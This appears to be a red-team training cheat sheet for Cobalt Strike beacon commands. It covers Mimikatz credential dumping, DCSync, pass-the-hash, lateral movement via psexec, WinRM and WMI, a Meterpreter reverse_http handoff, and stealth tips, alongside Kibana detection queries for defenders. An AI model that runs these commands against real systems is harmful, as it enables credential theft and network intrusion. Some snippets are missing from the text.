Here is a list of common commands supported by a Cobalt Strike beacon. Also see S1ckB0y1337/Cobalt-Strike-CheatSheet for some notes.
Beacon Management
11-c2 C2
connect [host] [port]
: let CS connect to another TCP beaconlink [host] [pipe]
: let CS connect to another SMB beaconsleep N
: change the sleep interval to N seconds- OPSEC warning: increasing check-in frequency may produce more noise on the network and reduce stealth.
checkin
: manually issue a check-in to the beacon- DNS beacons require a manual check-in upon connection because they do not automatically send metadata over (due to DNS bandwidth limits).
Job control
jobs
: list jobsjobkill N
: kill job N
Session Passing
spawn [x86|x64] [listener]
: create a process and inject shellcode for a given listener- foreign listener (MSF protocol):
- In msfconsole: Start a handler and set payload to
windows/meterpreter/reverse_http
- In CS: Create a “Foreign HTTP” listener with host and port matching that of the MSF handler. Once the payload is run (e.g. in a
spawn
command), msfconsole will receive a new Meterpreter session. - Note: x64 & stageless payloads not supported
- In msfconsole: Start a handler and set payload to
- Alternatively, Meterpreter session can be created by first generating a raw stageless shellcode meterpreter payload using msfvenom, then using
shspawn [x86|x64] [file-to-payload]
to run it.
Code Execution
03-execution Running code
run
: run a commandexecute-assembly
: beacon will run a C# executable provided by the attacker by injecting it in memory (no files saved)powershell-import /path/to/module.ps1
: import a PowerShell module (provided by the attacker)powershell Cmdlet [Args...]
: run a PowerShell command on the beaconed host; piping supportedpowerpick Cmdlet [Args...]
: run PowerShell commands without spawning a powershell.exe process; also supports AMSI-bypass (post-ex option) unlikepowershell
Information Gathering
08-discovery Basic
getuid
: get UID of beacon’s process
Screenshotting
screenshot
/printscreen
: take a screenshot (second one uses PrintScr)screenwatch
: take periodic screenshots of desktop
Keylogger
keylogger
: start a keylogger job (also seeView > Keystrokes
)
Clipboard
clipboard
: get clipboard content
Files:
mv A B
: move/rename filescd DIR
: change current directoryupload PATH
: upload a local file to the beaconed machine
Reconnaissance
net logons
: view logged on users on machine
Mimikatz / credential theft
logonpasswords
/mimikatz !sekurlsa::logonpasswords
: dump cached NTLM hashes / passwords (elevated)mimikatz !sekurlsa::ekeys
: dump Kerberos encryption keys for logged on users, which are more relevant than NTLM hashes since it’s the former that gets used over the network most of the time. Look for aes256-hmac.mimikatz !lsadump::sam
: This dumps NTLM hashes in the SAM database (local users only). If sysadmins reuse administrator passwords, SAM dumps can lead to lateral movement.- OPSEC warning: This opens a handle to the SAM registry hive (Kibana: “Suspicious SAM Hive Handle”).
mimikatz !lsadump::cache
: Extracts domain cached credentials, which can only be cracked offline (since format isn’t NTLM) and cannot be used for attacks like pass-the-hash.- OPSEC warning: This opens a handle to the SECURITY registry hive (Kibana: “Suspicious SECURITY Hive Handle”).
NOTE
Aforementioned Kibana saved searches are found in RTO lab.
Lateral Movement
pth DOMAIN\USER NTLM_HASH
: pass-the-hash (uses Mimikatz underneath)- Use
ls \\BEACON_HOST_FQDN\c$
to test for admin access after impersonation make_token domain\user plaintext_pw
: create a token for a user given the plaintext password (uses LogonUserA API); token can only be used over network- Logon type passed to LogonUserA is
LOGON32_LOGON_NEW_CREDENTIALS
, which uses the caller’s token for local machine, and only uses the provided credentials over the network. This means thatmake_token
only works for authenticating against remote services. Usespawnas
for local machine. - looks the same as
runas /netonly
in logs (hard to distinguish between regular and malicious traffic)
- Logon type passed to LogonUserA is
- Use
remote-exec [psexec|winrm|wmi] [target] [command args...]
: execute a command on a remote host; useremote-exec
without arguments to list supported modules (e.g. psexec, winrm, wmi).- see
jump
for psexec and winrm - wmi: WMI provides a “process call create” API to execute commands on the target. remote-exec abuses it by having it execute the uploaded payload binary.
- To identify:
event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
- To identify:
- see
jump [psexec|winrm|...] [target] [listener]
: run a payload on a remote target; runjump
without arguments to list supported modules (e.g. psexec, winrm, …)- winrm & winrm64
- OPSEC note: Use of SMB payloads is recommended since SMB traffic occurs frequently in AD environments.
- One way to identify this lateral movement (that produces a lot of false positives):
event.category: process and event.type: start and process.name: wsmprovhost.exe
- To identify this lateral movement:
event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
- psexec & psexec64: uploads a service binary that in turn executes the provided payload binary
- Use of SMB payloads is also recommended as before.
- To identify this lateral movement:
event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe
- psexec_psh: use PowerShell oneliner instead of uploading a binary; always 32-bit
- command pattern:
%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
- command pattern:
- winrm & winrm64
- Running a second BOF as a different user (e.g. in case the call to CoInitializeSecurity triggered by running the first BOF was under a low-privileged user):
beacon> execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
rev2self
: revert ticket to original (delete pass-the-hash ticket)
DCSync
07-credential-access09-lateral-movement See: DCSync
The dcsync
command lets us obtain username and credential data (e.g. NTLM hash) from a DC. This requires GetNCChanges
which usually is only available to domain admins.
This can be useful for crafting a golden ticket (by specifying krbtgt as the user) or move laterally to other domain admins.
A ticket is required for this command (e.g. make_token DEV\jking Qwerty123
)
The beacon command is a wrapper around mimikatz lsadump::dcsync
, which uses the MS-DRSR protocol.
OPSEC warning
Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).
Find these using the “Suspicious Directory Replication” saved search in Kibana.
Token Impersonation
See: token impersonation
Pivoting
SOCKS
SOCKS4a proxy:
beacon> socks [port]
OPSEC warning
SOCKS4a proxy may be used by any user or device that has access to the team server. Use SOCKS5 for best security (i.e. authentication).
SOCKS5 proxy (supports authentication & additional logging):
beacon> socks [port] socks5 disableNoAuth [username] [password] enableLogging
.
- Either view the teamserver output or use
journalctl
to view SOCKS5 authlogs.
To use the proxy in proxychain, first edit the config:
Then to make a program use the proxy:
Port Forwarding
Reverse port forwarding: forwards a source port (on the beaconed host) to a destination interface and port (on the team server)
OPSEC warning
Windows Defender Firewall alert will appear in the graphical shell. If the user clicks Cancel, an explicit block rule will be created. To prevent it, create a rule to allow the traffic before running the
rportfwd
beacon command:
Remove the firewall rule later by its diaplay name: